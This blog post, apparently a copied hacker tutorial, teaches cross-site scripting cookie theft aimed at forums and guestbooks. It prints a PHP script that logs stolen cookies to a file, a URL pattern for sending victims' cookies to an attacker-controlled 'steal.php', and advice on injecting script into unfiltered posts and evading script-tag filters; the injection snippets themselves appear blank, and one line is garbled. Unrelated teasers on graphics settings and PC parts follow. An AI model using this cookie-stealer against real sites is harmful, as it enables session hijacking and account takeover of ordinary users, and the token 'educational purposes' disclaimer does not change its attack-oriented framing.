Skip to main content

Cookie stealing

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie.

Here’s an example of what might be in your cookie:
Code:
username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:

Code:
$cookie = $_GET['cookie'];
$log = fopen(”log.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script:

Code:
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:

Code:
Click Me
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.

NOTE: FOR EDUCATIONAL PURPOSE ONLY.I AM NOT RESPONSIBLE FOR IF ANYTHING GOES WRONG.... 

Comments

Post a Comment

Popular posts from this blog

3D ANALYZER SETTINGS

Settings for Prince of Persia Sands of Time Works with this game, u can try wid others also which are not in above list Performance section: -force zBuffer Hardware limits: -emulate HW TnL caps -emulate Pixel shader caps ANTI-DETECT MODE section: -shaders Z-buffer section: -24 bit zbuffer(with stencil) DirectX DeviceID’s section: NVIDIA GeForce Ti4600 Configuration: VendorID : 4318 Device ID :592 Works well in the following or higher configuration -Intel 865GSA motherboard, -512 MB RAM, -Pentium D dual core 2.66 GHz processor, -No graphics card required…….. have fun.
184 comments
Read more

Choosing the Best Motherboard

We will look at the various factors you should take into account when choosing your gaming motherboard, to ensure that you choose the best motherboard for your needs.If you think of the processor as the brain of a computer, then the motherboard could be described as the central nervous system, responsible for relaying information between all the internal components. In other words, it’s the hub of the computer, where all other components connect to. Since the motherboard is so crucial to your system, buying the best motherboard you can afford is a good investment. Select Your CPU First Before choosing your motherboard, you should have already chosen your CPU. If you haven’t already doneA motherboard will generally only support one type of processor, such as a Pentium 4 or Athlon 64. Different CPUs have connectors that vary physically from one another. So you can’t accidentally plug in the wrong processor into the wrong motherboard. Also, take note that many motherboards
Post a Comment
Read more

Choosing the Best CPU for Your Gaming Computer

Picking the latest, fastest or most expensive processor on the market won’t always result in the right CPU for your particular system. Some processors are designed to work with certain motherboards, so the CPU you choose will limit the type of motherboard you can get. The CPU (Central Processing Unit) is one of the most important components in any computer system. The CPU could be described as the brains of a computer. It contains the logic circuitry that performs the instructions of the software you run. The performance of your games and other applications will be directly related to this tiny little microprocessor. The Major Players: Intel and AMD Two companies dominate the CPU market, Intel and AMD (Advanced Micro Devices). Both companies make a range of different processor models.  For example, Intel have the Core i7 and Core i5 processor models, while AMD have the Athlon and Phenom series.  The Best CPU for Gaming If you’re a basic computer user and you don’t
14 comments
Read more